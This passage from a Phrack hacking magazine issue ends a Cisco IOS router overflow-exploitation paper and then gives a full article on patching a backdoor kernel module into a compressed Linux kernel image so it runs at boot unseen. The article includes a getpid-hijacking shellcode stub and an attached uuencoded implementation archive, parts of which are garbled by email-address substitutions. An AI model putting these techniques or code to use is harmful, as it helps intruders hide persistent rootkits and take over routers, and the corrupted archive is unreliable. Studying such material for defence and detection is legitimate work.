real config text - not the header.
The checksum is calculated over the whole thing (header plus config) with
the checksum field itself being set to zero. This is a standard one's
complement checksum as you find in any IP implementation.

When putting it all together, you should have something along the lines of:

 |              |
 | Bootstrap    |
 |              |
 | config_copy  |
 |   XOR pat    |
 | NVRAM header |
 | + config     |
 |   XOR pat    |

...which you can now send to the Cisco router for execution. If everything
works the way it is planned, the router will seemingly freeze for some
time, because it's working the slow loops for NVRAM copy and does not allow
interrupts, and should then reboot clean and nice.

To save space for better papers, the full code is not included here but is
available at . It
supports some adjustments for code offset, NOPs where needed and a slightly
different fake block for 11.1 series IOS.

--[ 6 - Everything not covered in 1-5

A few assorted remarks that somehow did not fit into the rest of this text
should be made, so they are made here.

First of all, if you find or know an overflow vulnerability for IOS 11.x
and you think that it is not worth all the trouble to exploit since
everyone should run 12.x by now, let me challange this. Nobody with some
experience on Cisco IOS will run the latest version. It just doesn't work
correctly. Additionally, many people don't update their routers anyway. But
the most interesting part is a thing called "Helper Image" or simply "boot
IOS". This is a mini-IOS loaded right after the ROM monitor, which is
normally a 11.x. On the smaller routers, it's a ROM image and can not be
updated easily. For the bigger ones, people assured me that there are no
12.x mini-IOSes out there they would put on a major production router. Now,
when the Cisco boot up and starts the mini-IOS, it will read the config and
work accordingly as long as the feature is supported. Many are - including
the TFTP server. This gives an attacker a 3-8 seconds time window in which
he can perform an overflow on the IOS, in case somone reloads the router.
In case this goes wrong, the full-blown IOS still starts up, so there will
be no traces of any hostile activity.

The second item yours truly would like to point out are the different
things one might want to explore for overflow attacks. The obvious one
(used in this paper as example) is a service running on a Cisco router.
Another point for overflowing stuff are protocols. No protocol inspection
engine is perfect AFAYTK. So even if the IOS is just supposed to route
the packet, but has to inspect the contents for some reason, you might find
something there. And if all fails, there are still the debug based
overflows. IOS offers a waste amount of debug commands for next to
everything. These do normally display a lot of information comming right
from the packet they received and don't always check the buffer they use
for compiling the displayed string. Unfortunately, it requires someone to
turn on debugging in the first place - but well, this might happen.

And finally, some greets have to be in here. Those go to the following
people in no particular order: Gaus of Cisco PSIRT, Nico of,
Dan of, Halvar Flake, the three anonymous CCIEs/Cisco wizards
yours truly keeps asking strange questions and of course FtR and Mr. V.H.,
because without their equipment, there wouldn't be any research to speak
of. Additional greets go to all people who research Cisco stuff and to whom
yours truly had no chance to talk to so far - please get in touch with us.
The last one goes to the vulnerability research labs out there: let me
know if you need any help reproducing this `;-7

--[ A - References

[1] anonymous <[email protected]>
    "Once upon a free()..."
    Phrack Magazine, Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12

[2] Cisco Router IOS Memory Maps

[3] GNU binutils

[4] Motorola QUICC 68360 CPU Manual
    MC68360UM, Page 6-70

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x08 of 0x10

|=-------------------=[ Static Kernel Patching ]=------------------------=|
|=-----------------=[ jbtzhm <[email protected]> ]=---------------------=|
|=---------------------[ ]=-----------------------=|

--[ Contents

  1 - Introduction

  2 - Get kernel from the image

  3 - Allocate some space in image

  4 - Relocate the symbol in module file

  5 - Make it autorun when reboot

  6 - Possible solutions

  7 - Conclusion

  8 - References

  9 - Appendix: The implementation

--[ 1 - Introduction

This paper will show a simple way to patch a common LKM into the
static linux kernel image.Most kernel backdoors are implemented by loadable
kernel module which is loaded into kernel by insmod or /dev/kmem,and the 
backdoor module can found easily if the disk can be mounted on other 
machines.It is not the expected result.What is wanted is just to find a
method to put the LKM into kernel image,and make it run when reboot.

The program attached in the appendix contains codes and debugs in redhat7.2
(Intel)default installation,and can be easily tested on other kernel 
versions by some modification.Also the program is based on the 
/boot/ file which contains the kernel symbol address.If the file
doesn't exist on your system,more works have to be done to make it run.

--[ 2 - Get kernel from the image

The first step is getting kernel from image file that is usually compressed
(uncompress image is not concerned because it is much easier).The image
file can be analyzed from the kernel source files,and Makefile will
clarify the structure of the image.


zImage: $(CONFIGURE) bootsect setup compressed/vmlinux tools/build
        $(OBJCOPY) compressed/vmlinux compressed/vmlinux.out
        tools/build bootsect setup compressed/vmlinux.out $(ROOT_DEV) >
(bzImage is similar)

bootsect: bootsect.o
        $(LD) -Ttext 0x0 -s --oformat binary -o [email protected] $<

bootsect.o: bootsect.s
        $(AS) -o [email protected] $<

bootsect.s: bootsect.S Makefile $(BOOT_INCL)
        $(CPP) $(CPPFLAGS) -traditional $(SVGA_MODE) $(RAMDISK) \
$< -o [email protected]

setup: setup.o
        $(LD) -Ttext 0x0 -s --oformat binary -e begtext -o [email protected] $<

setup.o: setup.s
        $(AS) -o [email protected] $<

setup.s: setup.S video.S Makefile $(BOOT_INCL) $(TOPDIR)\
/include/linux/version.h $(TOPDIR)/include/linux/compile.h
        $(CPP) $(CPPFLAGS) -D__ASSEMBLY__ -traditional \
$(SVGA_MODE) $(RAMDISK) $< -o [email protected]

The bootsect and setup file are easy to understand.They are created by
bootsect.s and setup.s respectively.The vmlinux.out file is raw binary
file generated by objcopy command.The value of $(OBJCOPY) is
"objcopy -O binary -R .note -R .comment -S". More details are available
by `man objcopy`.When the three files are ready the build program will
bind the three files to on file which is the kernel image file.
However the vmlinx file is generated more complicatedly.It is also possible
to go into the compressed directory and look through the Makefile.

vmlinux: piggy.o $(OBJECTS)
        $(LD) $(ZLINKFLAGS) -o vmlinux $(OBJECTS) piggy.o

The $(OBJECTS) includes head.o and misc.o,compiled by head.S and
misc.c respectively.The most important step in head.S is calling
the decompress_kernel function in misc.c.The function will inflate
the compressed kernel.When the decompress_kernel takes effect,it requires
input_len and input_data symbol which are defined in piggy.o

piggy.o:        $(SYSTEM)
        tmppiggy=_tmp_$$$$piggy; \
        rm -f $$tmppiggy $$tmppiggy.gz $$tmppiggy.lnk; \
        $(OBJCOPY) $(SYSTEM) $$tmppiggy; \
        gzip -f -9 < $$tmppiggy > $$tmppiggy.gz; \
        echo "SECTIONS { .data : { input_len = .; \
        LONG(input_data_end - input_data) input_data = .; \
        *(.data) input_data_end = .; }}" > $$tmppiggy.lnk;
        $(LD) -r -o piggy.o -b binary $$tmppiggy.gz -b elf32-i386 -T \
        rm -f $$tmppiggy $$tmppiggy.gz $$tmppiggy.lnk

The piggy.o file is a common ELF object file.However,it only contains data
section.The ld requires a command file like this\

SECTIONS { .data : { input_len = .; LONG(input_data_end - input_data)\
input_data = .; *(.data) input_data_end = .; }}

The command file enables the piggy.o to have the symbol which is required 
by misc.o.Hopefully the command "gzip -f -9" also can be seen. It just 
compressed the kernel file compiled by thousands of kernel source files.

So the kernel image could be described like this

Now let us understand more about the boot process.
The process can be separated into the following some logical stages:
1.BIOS selects the boot device.
2.BIOS loads the [bootsecto] from the boot device.
3.[bootsect] loads [setup] and [[head][misc][compressed_kernel]].
4.[setup] do sth. and jmp to [head](it is at 0x1000 or 0x100000).
5.[head] call uncompressed_kernel in [misc].
6.[misc] uncompressed [compressed_kernel] and put it at 0x100000.
7.high level init(begin at startup_32 in linux/arch/i386/kernel/head.S).

After the machine run into step 7,the high level initialization begins.

When the structure of the kernel image is clear,kernel text from the 
compressed image with a dirty method are easily available.It is matching
the compress-magic contained in image.It is also known the 4-byte number
before the magic is the input_data from which the offset can be verified.
After this gunzip the kernel is pretty easy.

--[ 3 - Allocate some space in image to use

The allocation here doesn't mean vmalloc or kmalloc method.It just means
space is required to contain the LKM file.The lkm file >> the kernel can
be easily catted,but it will not work.To find the reason,the best method is
to go back into the kernel initial code,which is all in step 7 mentioned 

 * Clear BSS first so that there are no surprises...
 xorl %eax,%eax
 movl $ SYMBOL_NAME(__bss_start),%edi
 movl $ SYMBOL_NAME(_end),%ecx
 subl %edi,%ecx
After reading the head.S file,the above code can be found,which clearly
expressed that it will clarify BSS range.The BSS area contains the
uninitialized variable which is not included in the kernel file,but the
kernel memory will leave the area to bss.So the lkm will be clear if just 
appending the code to the kernel.To solve the problem some dummy data
can be added before the code the length of which is just equal to the bss
size.Though it will make the new kernel much larger,the compressed will 
help to deflate all the zero data effectively.

However there is also another problem.Read through followed code

void __init setup_arch(char **cmdline_p)---called by start_kernel
         * partially used pages are not usable - thus
         * we are rounding upwards:
        start_pfn = PFN_UP(__pa(&_end));start_code = (unsigned long) &_text;
 init_mm.end_code = (unsigned long) &_etext;
 init_mm.end_data = (unsigned long) &_edata;
 init_mm.brk = (unsigned long) &_end;//it is bss end

The kernel wouldn't leave any space to the lkm unreasonable,so it will 
manage the space available from the bss end which is just the beginning 
of the LKM code.Therefore,the _end symbol in text should be modified to 
give the start_pfn a larger value.Then the new kernel will be like this:

[modified kernel][all zero dummy][module]

--[ 4 - Relocate the symbol in module file

The module is common LKM file and its type is usually ELF object file,and
the object file need to be relocated before it could be used.The following
example make it easier to understand.

int init_module()
 char s[] = "hello world\n";
 return 0;
After compiling the program by command gcc,the module.o is available:

[[email protected] test]#gcc -O2 -c module.c

[[email protected] test]# objdump -x module.o|more
OFFSET   TYPE              VALUE
00000004 R_386_32          .rodata
00000009 R_386_32          .rodata
0000000e R_386_PC32        printk

[[email protected] test]# objdump -d module.o

test.o:     file format elf32-i386

Disassembly of section .text:

00000000 <init_module>:
   0:   55                      push   %ebp
   1:   89 e5                   mov    %esp,%ebp
   3:   68 00 00 00 00          push   $0x0
   8:   68 0d 00 00 00          push   $0xd
   d:   e8 fc ff ff ff          call   e <init_module+0xe>
  12:   31 c0                   xor    %eax,%eax
  14:   c9                      leave
  15:   c3                      ret

The object file structure is clear from the output of objdump.There are 
three entries in the text relocation section,and the offset shows the place
should be corrected.For the printk symbol,the type is R_386_PC32 which 
means relative call instruction(R_386_32 means absolute address).So after 
relocation the value of "fc ff ff ff" in the text that calls printk will 
be put out in the right value.

However,it is more complex than what can be described about the relocation,
and more information about it is available from ELF specifications.About 
the implementation of relocation Silvio had written many codes in his 
paper-RUNTIME KERNEL KMEM PATCHING-.Many lines are refereed from it and some
operations are added about uninitialized static and SHN_COMMON variables.

-- [ 5 - Make it autorun when reboot

After the above steps the new kernel appears like this
[modified kernel][all zero dummy][relocated module]

But the module don't have chance to be called,so the kernel running path 
has to be changed to call the function init_module in lkm.My method is 
adding some code between the dummy data and the module and changing the 
value of sys_call_table[SYS_getpid] to the code.Many programs (like init)
will call getpid when machine reboots,then the code will be called.

 char init_code[]={
"\xE8\x00\x00\x00\x00"          //call init_module
"\xC7\x05\x00\x00\x00\x00\x11\x11\x11\x11" //restore orig_getpid
"\xE8\x11\x11\x11\x11"          //call orig_getpid
"\xC3"                          //ret

All the relative and absolute addr is written by wrong value,but it is not
necessary to worry about that.When relocating the module the accurate
values about those address can be also make certain.

So the final new kernel had come int being.
[modified kernel][all zero dummy][init_code][relocated module]

Then the new kernel image followed the steps in Makefile is generated.Now
a new kernel patched by the module is available.

--[ 6 - Possible solutions

Deleting the /boot/ is the easiest way to prevent someone from
using this program without any modification.However Silvio had shown some 
ways to generate the kernel symbol list from kernel.So it is not the final
solutions.Adding some module to prevent kernel image from being modified is 
not a bad idea,but the precondition is the system should support the module.

When a kernel image was patched,its size and checksum could be detected,
so some function can be added to cheat the manager,but I don't have time
to do that.If you have more ideas please don't hesitate to contact me.

--[ 7 - Conclusion

Now it is clear that it is so easy to patch the kernel image.If the host
is compromised,nothing should be trusted,even if your own eyes.Halting the
machine and mounting the disk to another host is a good idea.

This paper is just for education.Please don't use it for other purposesA.
Sorry about my poor English and the dirty code of my program.Everything
should be better if I have more time.Though it could work well at
redhat 7.2,there maybe some problems if moved to all versions of linux
kernel.However,time is not enough for the tests on all kinds of

--[ 8 - References

 [1] Silvio's article describing run-time kernel patching (

 [2]  "Complete Linux Loadable Kernel Modules. The definitive guide
      for hackers, virus coders and system administrators."

 [3] <<Linux Kernel:Scenarios and Analysis>> by Mao Decao and Hu Ximing

 [4] linux kernel source

 [5] Linux Kernel 2.4 Internals
At last,many thanks to Silvio the source about the relocation.Also to my
co-worker lgx who give me many good advise when i debug the program.At
the same time i extend special thanks to Hou Hanshu who help me correct
much grammar mistakes in english.

--[ 9 - Appendix: The implementation

begin 644 kpatch.tgz
M'XL(`$\'Y#T``^P\2W`<[email protected]"N<M6++43Y.G#C-50CM_X<?C2404A0HL42"
[email protected];!T%T&MQ9[?]/KT/F_^'0'58ZSVB.&C!V>7%Q%O^7:TO+Q/_:XG)]9;D!
M\(WZ4GU.U)X1/M;U"\[_:D%\8^Q%KB_V'XIM;_#`"\1U-VR/77&[email protected]
[email protected]=4^NMVU<#;M^LZT<.1FP0;>_Z!73?Q/>AMU_4Z?C28FB$YZ<#S)\=5
M%!RY8Q'T1'049(#ZF=>Z;L_S7?'.]KNW6V]?VWZ[[email protected]<(I=
M+B&BW8()QS!3#G`6A][email protected](/"ZHK`_Z96$!,2/?`;[email protected]!C-WK0'@`>
[email protected]!3_/[email protected]^BD($P((0/#[email protected]@V3)3#"HV/AT/[email protected]'(>8!*K0F[]DI"
M+*"N6,RC("8E411(.M9$;JHA/Z][email protected],Q2>G:F8S'+F"P)@S("HLVP!_U451R
M"@J6CW,Q&@XMI)?#KT[6;P_=57$)Q*[;'<.7P?%[?K9$;;)W>1VGJ"[email protected]
M5XV2I%>[email protected]*1#;7`:T0B4X?[&@!N4"$FOBA=^"[73$(_`/1AXXFV$B3L(\D
MA,V!$T#?)K:)[email protected]"@?00V"=?&`$4$-78%7TQ+W(VX459U'EGT-Z%)7M^Z(ZC
MW;JE-WZYCD-+"8G%@<B,)>`5$AA5LP/FJ3-ZF)O'@[email protected]%+/,Y
M'653G)[email protected]$PA4FB2URS:ABW/]R)+`(;M$=&42N$N&!T4Y1LW;VV(0J_YA!L(
MF#LZ%B4V\HXC]T!)"[email protected]*R#`![I%P62`@\\#2'V9-AB)`N([email protected]\^@+[XM987
M%%+,V6_[AQ0%8J`Z=L'Q:6.8*#[email protected]``Q][email protected]$[[T\P;J)<@TPB>,/1P!VB
M(L)A*OMA*$!#[0<#B#3!_PN&0QA2UASU71]'B>=SJ9><J1(&X$_<QT`[email protected]
MAVE)C"N/).Y&7L,=]#"MD9+H4(F#UIL;;]Q["R!Z4*%+LO'NULW-G1NYX[[email protected]
M*RN.,Z^Y$.5.`T"]W_5Z\;@W;U][:Z-U^]H?.(NUKRW#WI>[email protected][email protected]#]I<KFJ
M)E#EX!&0)X/<\#KL$P`?(G?8`O=R%WPJD:[email protected]*H;E-M!6JS306.'B^Y+>PE
M&;[email protected]`G?0,ZQ;M2#FX%9WW6-H*4\W^9.A;(C7LWESIW5K8]-IU#.$''KE+=R!
MNWMK[V>R[QUO7'[ON%8S[ZSC5*L=B%08F#<#@[email protected]>:E)/A[Q_6Z>6=%M3IV
[email protected]?>P<MD.N1UU5S)8#U7`G0ZPM9#-AQJ,C,D4ETT-79&/06&JV-?G?L
MN/"[email protected]*D"#C4<*!P#]U7)^(KN>'[email protected]%*#.I1P7
M9]_D/[email protected]#Y%=0XT#MD$MC,,Y(O!UV6'DP4LBZ41F3D\B^$;>0+EXZ.'-
MB`6#OI-`Z,04X0T37$R$IS*T/$GG)2F]3M_M'[email protected]*1Q.8L5[2A3<!"EY
MDZGD9+N;ZW5+`BOCM`*6\A03)VJ0LB-2=;DL][email protected]&/O2B'21E<`/@;&[=N
M,,8A6F6>284R+M'0;7E=\`5*"`I:&+.F]$5.T9/A'[email protected][F`RB^QL8*/E!A/`0
M$KE!T.ZVY`[(L1K`!!T+&3`NL5E9[0%ZG`Y'[email protected]=",C-<X9`5.8J%?:
MBBGU(.?7>3=S'ZJT#Z=$XAR.&IG[S"*[email protected]"X-GM<$G^[YFSQMZCW]/O5,H),
MX*[email protected])E)%4M:$V>:QU+5VAYH)YL"U=%[email protected]";/9XY7U#"QKH:<Y*&0D;.
MF&AJ_K`[email protected]^,00D]'`M",@.K:FUTIU!0PSRYF,1"'<\`4OU4(JU\6DO\
M3#*5B*4L?_3E_80W+$12")/M>D)5<:+,,=I/[email protected],9HVZ[P3S'H6$P>->$(B
MG-)2K=L[6V#PJ=525PJ;DE!Z*+;`'M([email protected]:I>XQ>5?.E#<#)/":L^8F9V-5
MX":-`C]\[email protected][/([email protected]!ICK*+8*'+$K%5QR=//XBP^QDY-+-JT69QB40I+K`M5
M##]3$;(.V7('[email protected]"P,VS+E$-N:)]4KTTC//#\P[UF<@[email protected]]*/!NN(\R-+84<.
MRNMC8&<OR,>=KD&\(63086(7M<<'J:ZJGAP'2HS3#3`;*U1?`L.Q15'([email protected]
M)=A5!Q[>43BIZCT.^;'ID(7*>,`@@;GKB:`<[email protected](!19#G0*DGK+8#ZT<DB'N
M72!305"@)SWQLV2)L%2+)")@.U"Y\D.KZ8;[email protected]"92!E#[7]]F;K^IW;
MO(;*O.E`S$OEXAH9"=`,4.U0[&MT-3I*P*8YKV&[email protected]*\[$Q]::235S
[email protected][email protected],'^V;Z:V$0GH,]0=*,J'&IRAFY+EG$LSN0<0U93IQJDD?\JM-
M9Q^KN#9KOTB&5JL>/88+`W"P`@A,62<%/24?\"VVS5J\9,!T$1][email protected]%XR\K]:
M:*7'ET#.I#6?2"')/CT44/.Q:C#[email protected]<#,=3>NNS)9<1)XG[)
M5)6$I!23G4[AYR[@K)&C;<*O"QOF="[email protected]_0*`C$`&P\6'V<(GQD67]C^'2[
MX$Q\Q($8'L]59HZ5%TK$]M(";[email protected]\0C;\1"(=K1ZJ41:BP8,J]C?1H_
MY4RKTN,%VYO"[email protected]!!MF6SWBV8H"R)=?)`SQQ:7.^7I!*M>EC:5
MBS7/]2NM+?7M$/A//\4!^]]1)[email protected]^X/=/>,4`NQDRIRH8SFQME06E3^:2A?+
M+Y;]Y-,SN/I=?5A)'[email protected]%AYBFM"_,W<)3+JVHO4_S)*()FEZ9L9381+I7
M$5;Y.*FXPIUIU'[email protected]/3C\[email protected]'@.X0!"7'YE8SAO6T
[email protected]&U27;J>RSF)?,QL1*&[email protected];5Z79.F3C+.KX%X+7C2X-CL?\P<L/3
MM%Y<CMTP<SVMED;IV2PF!DIFP%/[email protected]=WS5'A`O[.P0)`I'"QB:EPE'>D(K.QJ
MPIB&D3_31DL,[email protected]`<D'"02((SN<AGZ%63C\016`O.E?M#@/P\(-)%'I=\ZAU
[email protected]<<[email protected]*O)',VQHXSPQD5>>E(JW"3=;A%E-*\G*"T:+O3.^2&C$.5
ME,'D$R%BTE_Y.:<@D<1!N4*[email protected]$R`@8I'BGJ<[email protected]'MTR;?#YS7Z6!<
MI<[email protected]/[M-`(;L`():61UU9O5JLPAF&I)$4AS"-&R$0A`=!`FJ]U]A=-*U>&
[email protected]]:(U4SY5G/08%@OC:[email protected]/!OW.E$!'S-$,[email protected]@)S\<Y=(A3D
M862$-)S>15ZI1_F0A/>/"=FC&1%IG)[[email protected]),V.DNCTC17.$),NDJHJSIQL!IG
M[,&[email protected]/_H)JFVSYHFOTB7^?ZO_C.:XXS]7Z^OU.7^7UQ<6.+W?^'[WY[O
M_V=_O>;U\.":>.?VQNW6V_&KH[CX6+^9/?6M7/[email protected]`[Y=1[@(.79+<E6
MN^X#DMQL27!#/H9F'^"PFQ?\#;_FG_9]5,VG?3&4?(46.2#[email protected]?>(ST#0
M+YO9)Z&%GO%2E>;,]Q+)2>C1)4?QF+)BOQ4'3G]'E.PE'2'=#2([email protected][.OY_
M'<_<8>(+?X[@ZS,]X-.%4<CO][email protected]*44^5OA9"_[SBR[K_0_/:`[4_S/?
[email protected]^]])<;NZK<U^!3RS#_2'`P/TQ?,?[<W"?A_M%N'^*-[3A_2I\?U6V
MG9,W7="&]Q_FY^;PQOYSKW#[AU#^\&_/7\#[[email protected]!"N,EV?X"?/0+</_=^0MX
M^$:\[email protected][TF8+\/]!;A_6];C];MP9^'^=0F/\_T*W%^!^R+<7X3[-;B_.H,/
M*%?E^"]#^2J4?RS'^VNX[T+Y'V7YO^'^%I3_69:1MB,H-V3Y"[email protected]
[email protected]+\C\@/6#_]F49Y>][email protected]_2!]C^3[?^!](#R#V7Y/^'^BS]7\%^8^TOX
MK'TOQL>458'_6JV#8>#S(Z96:PZV5P>WU?(<GZ:"=GK!:VO_?\F[[email protected]?
MD^G`,`[email protected],`1%LUO(/[email protected]$.DW7""-P;"<[email protected]</8!G4QSB#Z(1"<C.O8
M=!OC/YXQ_N`E,][email protected]+A#AY&01EKS#2WYK;FVVZ'&.6VYI6-S1!W
MU&[email protected]`=S.GU9^N3(_[LX`5ZY]@,3V(#C#[,;8S?O85W#$*O46/C></N
MN&,(>HF;C;2;TCELF3'H:\#?#BCE\REW*+>K7'!J"?#3`[email protected]/,)]2
M>`9#2N,9'2/4'PA.3,(S.#$'GL'1N?`,3LR-9W!H^[email protected]&1S<:SR#!6#R#$RW"
M,PA6AF=POA/P#$8Y&<[email protected]"KQ#,ZO"[email protected]&;B&9SR;#R#([email protected]&1SX?#R#(ZS%
M,[email protected]@&9^W%,SCV)[email protected]&)[D,S^#<;\4S&'L#GF&2UH=.!A(.K1BZ&M%>@V_M
M2ZA]Y)!^S0GHJ5ZNP3?J2R]'S5!D%>O4X5..&E*P+-9!:[email protected]&E-P
M1-F`Z>2WF,:145JI_Y3&$5(>IOY3&D=*B5#_*[email protected]_E,:1T[92?VG-([email protected]
M\@+UG](XDLK+U']*[email protected]>ZG_E,:15:+4?TKC""OO4O\IC2.M=%#_*8TCKARC
M_E,:1U[II/Y3&BU`T:C_D)[VQ0]"GP1.)+U+ZI367:AY6)AN6:JT[9`<[email protected]$
MAN1TNYPRVW;DO>:IG"6GH/W5D`;J^[email protected]^[/9Y52&Y2Y6[`AND'/\L
M136^4AR1][#H&G2Y6OJ\I7(>5`[email protected]?8:`QO<-E\)$A\3Q!]8B3\%OC0F0#O<
MN5$9(\QN!:/WDRX\P$B[PLK"@R0)%]7)U^K.FWHXB*[email protected])O-3W1NQ[B??
M%K7,_YT,B][email protected],`Q810\[email protected]\UH^35KM;]\@W8`]4!L5-2Z
M*JQ89FJ[6DY:;+7%6G,GU&R7$VCU-`MK:[email protected]&F5XG;(YU]BHR/6#E24EPK)
MD0YH#L.'=8%9&(3>L;W<#ZH"Z9F]QA623U#[email protected]_8M>]*:ETM+Y&<(;F32LC5
M&25)H^0XP$<\[email protected]`P0?FO(#11E[;CT$59(_'M36IC//:%FC9YMRT
M6I6WV>7C`<V))I.C[`55>+5%*:L?GDN:[email protected]`1EG=XM00G4.NW!3YW0DXH
[email protected]<:RGS#L;?UCD;5,[2QNJ;ROIRXQRC[$M<*T$U2K9-"[[email protected]:-1/ZZ\*0;W
M^[email protected]@[N,.8CK8+I/IP,;W=(@_WI22]IJS\:"&KE(/5`6K)=V6&:;<^/7
MS"Y%%CH[TV499EJ-XQ.QORMP(;<.M(O+OAB\<@JFJGV^TQ6*[email protected],EY,
[email protected]%G3:A&PB*[email protected]_+`B088ER^^`\[email protected]:J"[email protected]/S-^3UT/(VFVVJHAR0V%-=
[email protected]),B0&/TS5C%F#X9O5C&6KV,L<Z)[email protected];XDNL^=WRNTA/EFEUU>+8]+W>\P
MU,/R>X[[email protected]]<#0QU-!OOQ0:"K3`U*6+B2BRWJJ;K)5.3%]K-B4I.JP_
[email protected]<OBJNYZ'D+L$$8V:#[email protected]^D>3B2,<5`"C?]`><]&:8`C1U9339-/]VYJ8
[email protected],&VY!--]K#\KE?=CF+#$E71$=#LP$'3JL_R%H.WZF05^AX$RE78
MY%9>%MB'6<P_>"]>H,94O%VI<[email protected]@4HB!?&:-24!T9*RE'I>U<#F!^'=J*K
MEK?YIV*G&K"%*6=-3>A[Z/*:6L>`<$221Q]7PICQMJ([email protected]=B.V((OM
MTG*3PGZ3VKDS&7UOQE;:,Z7*[email protected]>;Z9!:\INS/E[,[email protected]=X_O)!%[P6#2>]6
M,Y!,Y;HK.KQ&C\%([email protected]*`EP3;[email protected]*A/\.[8W/']YCK?I<T2TO\2
[email protected]"=9%[email protected]:,]GIA"US8?YU1<`=M<L1FHW!MLT'=-8ZEP5:''9^;1M%
M!NR"4%:[email protected]$59`R$OQ_4FD>?NTQ6&<.D/Q/<7*"C(,!Q\&UE[MVS-B^+`Q
ME#]CZ>Y^JG<BP<]Z5[^3JH.2$.A[D)M2]`+:/Y=,W8Y9*M'A_/'Q/N"5"[email protected]
M^A\';S(0'>[email protected]"&XP50C`J4!&VK]0LP$'&<[M6/GTIHLXE]G6&PT62!0
MZ8^\K%=-E9/BY6)-]LJ=6/F)A&G76'\9KX_%VM,)8;[email protected]`[email protected]
M^>#[D.S\YYDKQE[W>@P^$R^/SU=:[email protected]+6E4Y"9[_(X(U0_G![%D;RNL
MKT&[XD<B_<MQRT7E2!$#C,VL[;X3,[email protected]'K/!)#;W8>:ZQW+_E&XS(<?6
MVH/)"[email protected]/PM^S!!:I/BUV'\@VE0W5A2W>LT6&9>3W5*@\-4`!U]/8+QN^]%
MY"<G^[email protected])K7YMRVT0#^F,YBM>AB<(JE([email protected]*Z?]W-[`FJ,.+JW?`?*<M-[D
M&D+%$GBD?'Y_DAC$WPIU6^[G+ZXS?Z\Y.(HQ+W=M37;[email protected]^*U`\\_<:O&_Q
M?(-L+ZE<6R7'?_RKY'@[email protected]+#/+5]:Q_EZ\F.%Z62\1[&<SXN6\5H_U
M3I;MA23];N7L]^T<3M;[email protected]#$>O]*@EJ]S+>-P`=R^RJ[2/?Y3[6
M/][email protected];$>[email protected]>`*.Y^%X%8[#<'P$QV=P=,,QX&'),0J.<7#,@.-&.);"
MT0C'>[email protected]>@N,).)Z'XU4X#L/Q$1R?P=$-QX`0U(=C'!PS0KQ]E!\WN>#>1=PB
[email protected]]9A.V2`[LS?PVJ`MGZ4')@;K!/4F#C7KF/D5<#SM!5[@BXKUZW.>(
M&_"?/^;MX+Q;`WVV6?`L.,\VZ''C3:N!FRWX40M^TX*_LN!*F\!;+/A#"[[email protected]
MS;\L9:S,P&>6V]A"2=1=;<'W2Y?F:<[email protected]_X8G`]+*&=['YJ_4'X1X;.$BPFC
MQ")#V$+SM(6FMT[,_-0P,1;_-=SBJT>(^3ASA.C+[807$MXQ0LRO/[email protected]
M7XSU]817<9D)KR;\[_FBK5M'"IS[#P*?M^#FT8A_U:<O5OS$:.$#[email protected]
M<8'[email protected];,*A`]<3/BZ/GSN*L#]Z`69_#6,K[^!`HX]CTB.[1;\_VU=_FD!M[>\
M43;V1H&PO8\LN,N"AX_YWZVS5EQLU/W>6$9MF79[[email protected]>.$3[66O>YB[2[
M30((<H1;"$%%,<AE.004L=Y:A%"Q53R*%[email protected];00/4.I54*2(_;WW?O-FDNR*
M`[email protected]?<?:@[email protected]@+')3P.F#3^#G(9\11(P;4UT3C+M;2_D0M(!
M=V.']KW=NX=/[email protected],_QER&?(7R"N0OVH4_M'N1K<)/0P?[A&^C&R[LN,YA?=N
M3I>Z9R3$?Q##O(/\/O)GR!\@GT;^)W*+4<`?(]^([email protected]$?D(\F#D3Y`SD#]'
M*_+MR-Z)P!7(*@.X$OD=Y!W(O28!/XN\$_E'Y)Q,X(NQ')]&[email protected]:Y;Q9P)^2_
MA38J7-OUFA-G!V<<!3[3WR)W$O`FS%[email protected]+>"KLX#[[email protected]%=`VB!'"WCEHTL>
MA"4'/;<'J>WZQI)KW2"[email protected]&BL/P9/L:<S#7)&ZM&FS_9AO.9B''[AL\C#7
MH\PS.8]2Q9UN;P,\!]-)/%<<8ZX4/S//[email protected]#)WBZ5)J^`3V%>+1*C
M,EUMZ?^0I?]&=X0.O`G/&"+>XO8\P`^[*W#`6]T9$O`V=U8*_*B[[email protected]:\PZHO
MF5\19<ROBL7,^\5*YM?$6N8WQ0;FOXJMS&^+W<SOX%X!\4'Q+O-'[email protected]
M`6?F'$`^[email protected]_H_QK\;XE!QOX!N7?B0<<^5GD?XN55AAM#W7.5Y<C<*W%
M*RS[O\_A9I.!?RMK[];VGRJU\U"J(Q?,`Z1I#P?**[email protected]_S8(MOD:.8A\D)
M:?J['"[email protected]((<[Z$<0+9U439<(RD==9C"=`9^L0QJ'.AA//E2.<"U#DXF=CH
M8W&E_)AYOCS)O%!>PG5\L33]VA*+E\HXYBK9EWFY',)<[email protected]\WVK'[K':
ML7ME*?-*B^^7,YA7R7N8U\C'[email protected]?DF\R;Y2'F#?)$\R;)<SDR+:+L-PK
MT(:+T8;G(9?(;QK8`]G);`EM3A6&F2./[email protected];U>C?+'\Q))?9;4):1:76ORC
M-2:$,PL?1AO;)L5]VL:VHHT][email protected]\:V6^W&#MF<>:?LR/P'.8#Y":M]
M]UZP]/^CI?\NV9KY1:[7$"?PEQAGK3SDQ/D3QKD'X[[email protected]!CRIZW+9BQ1:SUK
M+[APN?R2;,'\LC1SM[_(FYA?D<G,K\I>S*_)X<RORXG,;[email protected]+F`^(,WX
M]W`9ZO4`Y#]AO1[M,M3E3.27Y"L.5R+OD_`F_#[email protected][I`;<B[$E[HK\$P
M[\D)5AA=OG7.=ZW5#[email protected]`%G!67!_0'O^&>W\19=-.V!>\$D54AG;
M;JJ,_9^OS-SJ,M6.^7)U,W,KY6>^[email protected]=RMQ:Y3%?J^8R7Z<>9FZC=C#_
M5K.9NRIC\S'J`>98M84Y3OV)V:<.,B<H,Y]*5-\S^]7Y;&_)[email protected],J
MP-Q=C6/NJ8K-.%FM8>ZMGF#NI][email protected][F_Q`'68>:`ZOXGF0:H-\V#5E_D6-8YY
M%>*:MH+3(]HA7Z#@G?E$Y&8*#@,[email protected]'[email protected]??QR)?I.`5\MQ"6HN&LQ.F(E^B
ML(?]&&8DAO\(>92"-^V/(X]6\-KX:>0Q:[email protected][8EB`?*B]KA(@P?[?(`AZF-
M'<6S$HYF`7F6\SVYUOAYGG+87V3X_\W/,];=>]+^[email protected][(L+[
M%Y'[email protected];5%'HU,O5$!,[email protected]=\J9!J-[42F%>&7D6EE\!`RK7B>0"9?
